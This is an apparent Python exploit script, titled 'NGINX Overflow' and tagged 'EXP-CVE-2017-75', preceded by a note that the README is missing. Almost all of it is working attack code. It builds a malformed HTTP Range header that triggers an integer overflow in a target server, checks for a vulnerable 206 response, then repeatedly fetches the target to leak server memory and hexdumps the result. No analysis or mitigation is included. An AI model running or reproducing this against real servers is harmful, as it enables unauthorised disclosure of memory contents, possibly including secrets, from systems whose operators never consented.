README.md
README.md not found for CVE-2017-75. The file may not exist in the repository.
import urllib.parse
import requests
import argparse
class Exploit(requests.Session):
buffer = set()
def __init__(self, url):
print("[DEBUG] Initializing Exploit class.")
length = int(requests.get(url).headers.get("Content-Length", 0)) + 623
super().__init__()
self.headers = {
"Range": f"bytes=-{length},-9223372036854{776000 - length}",
}
print(f"[DEBUG] Request headers set: {self.headers}")
self.target = urllib.parse.urlsplit(url)
print(f"[DEBUG] Target URL split into components: {self.target}")
def check(self):
print("[DEBUG] Checking if the target is vulnerable.")
try:
response = self.get(self.target.geturl())
print(f"[DEBUG] Received HTTP status code: {response.status_code}")
return response.status_code == 206 and "Content-Range" in response.text
except Exception as e:
print(f"[DEBUG] Exception during check: {e}")
return False
def hexdump(self, data):
print("[DEBUG] Starting hexdump of received data.")
for b in range(0, len(data), 16):
line = [char for char in data[b: b + 16]]
hex_chars = " ".join(f"{char:02x}" for char in line)
text_chars = "".join((chr(char) if 32 <= char <= 126 else ".") for char in line)
print(f" - {b:04x}: {hex_chars:48} {text_chars}")
def execute(self):
print("[DEBUG] Executing exploit.")
vulnerable = self.check()
status = "+" if vulnerable else "-"
print(f"[{status}] {self.target.netloc} is Vulnerable: {str(vulnerable).upper()}")
if vulnerable:
data = b""
while len(self.buffer) < 0x80:
try:
response = self.get(self.target.geturl())
for line in response.content.split(b"\r\n"):
if line not in self.buffer:
data += line
self.buffer.add(line)
except Exception as e:
print(f"[DEBUG] Exception during data reception: {type(e).__name__}: {e}")
break
except KeyboardInterrupt:
print("[DEBUG] Keyboard Interrupt detected.")
break
if data:
print("\n[DEBUG] Data reception complete, starting hexdump.")
self.hexdump(data)
else:
print("[DEBUG] No data received.")
else:
print("[DEBUG] Target is not vulnerable, exploit not executed.")
if __name__ == "__main__":
print("[DEBUG] Starting main execution of the script.")
parser = argparse.ArgumentParser(prog="NGINX Overflow",
description="EXP-CVE-2017-75",
epilog="CalebFin")
parser.add_argument("url", type=str, help="Target URL.")
parser.add_argument("-c", "--check", action="store_true", help="Only check if Target is vulnerable.")
args = parser.parse_args()
print(f"[DEBUG] Arguments parsed: URL = {args.url}, Check Flag = {args.check}")
try:
exploit = Exploit(args.url)
if args.check:
print("[DEBUG] Check flag provided, proceeding with vulnerability check.")
vulnerable = exploit.check()
status = "+" if vulnerable else "-"
print(f"[{status}] {exploit.target.netloc} is Vulnerable: {str(vulnerable).upper()}")
else:
print("[DEBUG] No check flag provided, attempting to execute exploit.")
exploit.execute()
except KeyboardInterrupt:
print("[!] Keyboard Interrupted! (Ctrl+C Pressed)")
except Exception as e:
print(f"[!] Exception at script top level: {type(e).__name__}: {e}")
print("[DEBUG] Script execution finished.")